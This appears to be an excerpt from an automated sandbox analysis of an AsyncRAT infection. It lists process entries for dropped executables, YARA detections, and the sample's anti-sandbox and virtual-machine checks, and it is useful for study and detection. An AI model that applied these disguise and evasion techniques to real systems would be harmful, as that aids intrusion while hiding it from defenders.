            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\Notepads.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara matchFile source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: Notepads.exeBinary or memory string: SBIEDLL.DLL
            Source: wscript.exe, 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, ame.exe, 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, Notepads.exe, 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, Notepads.exe.3.drBinary or memory string: SBIEDLL.DLLME: CHAT
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeWindow / User API: foregroundWindowGot 933Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\ame.exe TID: 6628Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6724Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exe TID: 6692Thread sleep time: -200000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6984Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exe TID: 3000Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\Notepads.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\fi.exeCode function: 4_2_02340D66 GetSystemInfo,4_2_02340D66
            Source: C:\Users\user\AppData\Local\Temp\ame.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\fi.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Notepads.exeThread delayed: delay time: 922337203685477
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmpBinary or memory string: VHyper-V Virtual Machine Bus Provider Pipes6
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: $Hyper-V Hypervisor Logical Processor
            Source: Notepads.exe, 0000001A.00000002.602077187.000000001BE94000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider Pipes[
            Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor.
            Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.594189844.000000000150C000.00000004.00000020.sdmp, Notepads.exe, 0000001E.00000002.575946515.0000000001378000.00000004.00000020.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition~
            Source: Notepads.exe, 0000001E.00000002.587730266.000000001BF61000.00000004.00000001.sdmpBinary or memory string: &Hyper-V Hypervisorw
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: Notepads.exe, 0000001A.00000003.562811005.000000001BFAF000.00000004.00000001.sdmpBinary or memory string: VHyper-V Virtual Machine Bus Provider Pipesk|
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: !Hyper-V Virtual Machine Bus Pipes
            Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: *Hyper-V Dynamic Memory Integration Service
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmpBinary or memory string: &Hyper-V Hypervisor
            Source: Notepads.exe, 0000001A.00000003.562291823.000000000154D000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipesx
            Source: Notepads.exe, 0000001A.00000002.603514623.000000001C841000.00000004.00000001.sdmpBinary or memory string: % Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186P
            Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipes:
            Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Provider Pipes*
            Source: ame.exe, 00000003.00000003.526302917.000000001B2B7000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmpBinary or memory string: VHyper-V Virtual Machine Bus Provider Pipes
            Source: ame.exe, 00000003.00000002.553947703.000000001B080000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus Pipes
            Source: wscript.exe, 00000001.00000002.335790807.0000016C16B30000.00000002.00000001.sdmp, ame.exe, 00000003.00000002.534824557.0000000000C10000.00000002.00000001.sdmp, fi.exe, 00000004.00000002.601520642.0000000005AA0000.00000002.00000001.sdmp, Notepads.exe, 0000001A.00000002.602647753.000000001C4D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: )Hyper-V Hypervisor Root Virtual Processor
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.601432394.000000001BC9E000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
            Source: fi.exe, 00000004.00000003.559369359.000000000087F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: ame.exe, 00000003.00000002.535507796.0000000002976000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.596083757.00000000035E6000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.576885778.00000000034E6000.00000004.00000001.sdmpBinary or memory string: *Hyper-V Virtual Machine Bus Provider Pipes
            Source: ame.exe, 00000003.00000002.555441828.000000001C01C000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmp, Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
            Source: Notepads.exe, 0000001E.00000002.581381581.000000001BC52000.00000004.00000001.sdmpBinary or memory string: VHyper-V Virtual Machine Bus Provider Pipes[
            Source: Notepads.exe.3.drBinary or memory string: vmware
            Source: Notepads.exe, 0000001E.00000002.576043419.00000000013E4000.00000004.00000001.sdmpBinary or memory string: Hyper-V mrytefrbsbkgqcx Bus]
            Source: ame.exe, 00000003.00000002.554498684.000000001B2AE000.00000004.00000001.sdmp, Notepads.exe, 0000001A.00000002.602281743.000000001BF1C000.00000004.00000001.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
            Source: ame.exe, 00000003.00000003.526156092.000000001C056000.00000004.00000001.sdmpBinary or memory string: st Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
